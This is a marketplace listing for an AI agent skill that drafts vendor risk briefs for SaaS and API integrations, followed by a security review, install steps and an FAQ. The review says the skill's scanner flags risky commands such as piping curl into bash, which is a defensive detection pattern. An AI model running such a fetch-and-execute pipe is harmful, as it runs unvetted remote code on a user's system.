← Back to Skills Marketplace
52yuanchangxing

Vendor Risk Brief

by vx:17605205782 · GitHub ↗ · v1.0.0 · MIT-0
darwinlinuxwin32 ✓ Security Clean
139
Downloads
0
Stars
0
Active Installs
1
Versions
Install in OpenClaw
/install vendor-risk-brief
Description
对外部 SaaS/API 形成风险摘要,聚焦集成影响、权限、数据流向和替代方案。;use for vendor-risk, saas, security workflows;do not use for 冒充安全认证结论, 替代正式法务/安全审批.
Usage Guidance
This skill appears to do what it says: offline, template-driven vendor-risk briefs and local audits using a bundled Python script. Before running: (1) review scripts/run.py yourself (it only uses the stdlib and reads local files), (2) do not point the tool at system/root directories or credential stores (it will scan files you give it), and (3) avoid feeding raw sensitive PII or secrets—sanitize inputs first. If you need network-backed fact-checking or automated changes to external systems, handle those steps outside this skill and with proper approvals.
Capability Analysis
Type: OpenClaw Skill Name: vendor-risk-brief Version: 1.0.0 The 'vendor-risk-brief' skill is a legitimate tool designed to generate security risk summaries for SaaS/API vendors. The core logic in 'scripts/run.py' is transparent, using only Python standard libraries to process local text, CSV, or directory inputs into structured Markdown reports. Notably, the script includes a 'pattern_report' function that acts as a basic security scanner for risky commands (e.g., curl|bash) and secrets, which aligns with its stated purpose of risk assessment without exhibiting any malicious behaviors like data exfiltration or unauthorized execution.
Capability Assessment
Purpose & Capability
Name/description match the included assets: a template, spec, examples, and a Python script that generates structured vendor-risk briefs and local audits. Requiring python3 is proportionate; no unrelated binaries, env vars, or cloud credentials are requested.
Instruction Scope
Runtime instructions confine work to user-provided inputs, local spec/template, and an included script. The bundled script can read files, scan directories, and parse CSVs; this is expected for audit functionality but means whoever runs it must avoid pointing it at sensitive system directories or credential stores. The SKILL.md explicitly advises read-only, review-first behavior.
Install Mechanism
No install spec—instruction-only skill with a bundled Python script. There are no downloads, package managers, or extract steps. Risk from installation is minimal.
Credentials
The skill requests no environment variables or credentials (primaryEnv none). Its functionality operates on local files and templates; no secret exfiltration or unrelated credential access is requested or present in the code.
Persistence & Privilege
always=false and user-invocable; the skill does not modify other skills or system-wide settings. It may write an output file if told to, which is expected behavior for a report generator.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install vendor-risk-brief
  3. After installation, invoke the skill by name or use /vendor-risk-brief
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
Initial release of vendor-risk-brief skill: - Generates risk summaries for external SaaS/API integrations, focusing on integration impact, permissions, data flows, and alternatives. - Designed for use in vendor-risk, SaaS, and security workflows. - Outputs include supplier summary, permissions & data flow, main risks, mitigations, alternatives, and recommendation. - Clearly states information gaps and operational boundaries; not a substitute for formal legal/security approval. - Supports review drafts and executable checklists; provides structure for localized templates and specs. - Emphasizes auditability and risk boundaries.
Metadata
Slug vendor-risk-brief
Version 1.0.0
License MIT-0
All-time Installs 0
Active Installs 0
Total Versions 1
Frequently Asked Questions

What is Vendor Risk Brief?

对外部 SaaS/API 形成风险摘要,聚焦集成影响、权限、数据流向和替代方案。;use for vendor-risk, saas, security workflows;do not use for 冒充安全认证结论, 替代正式法务/安全审批. It is an AI Agent Skill for Claude Code / OpenClaw, with 139 downloads so far.

How do I install Vendor Risk Brief?

Run "/install vendor-risk-brief" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Vendor Risk Brief free?

Yes, Vendor Risk Brief is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Vendor Risk Brief support?

Vendor Risk Brief is cross-platform and runs anywhere OpenClaw / Claude Code is available (darwin, linux, win32).

Who created Vendor Risk Brief?

It is built and maintained by vx:17605205782 (@52yuanchangxing); the current version is v1.0.0.

More Skills
self-improving agent
Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Clau...
⬇ 463815 · by pskoett
Skill Vetter
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
⬇ 259802 · by spclaudehome
Polymarket
Query Polymarket prediction markets. Check odds, find trending markets, search events, track price movements.
⬇ 232503 · by joelchance
Self-Improving + Proactive Agent
Self-reflection + Self-criticism + Self-learning + Self-organizing memory. Agent evaluates its own work, catches mistakes, and improves permanently. Use when...
⬇ 200680 · by ivangdavila
Github
Interact with GitHub using the `gh` CLI. Use `gh issue`, `gh pr`, `gh run`, and `gh api` for issues, PRs, CI runs, and advanced queries.
⬇ 191345 · by steipete
ontology
Typed knowledge graph for structured agent memory and composable skills. Use when creating/querying entities (Person, Project, Task, Event, Document), linkin...
⬇ 190333 · by oswalpalash

💬 Comments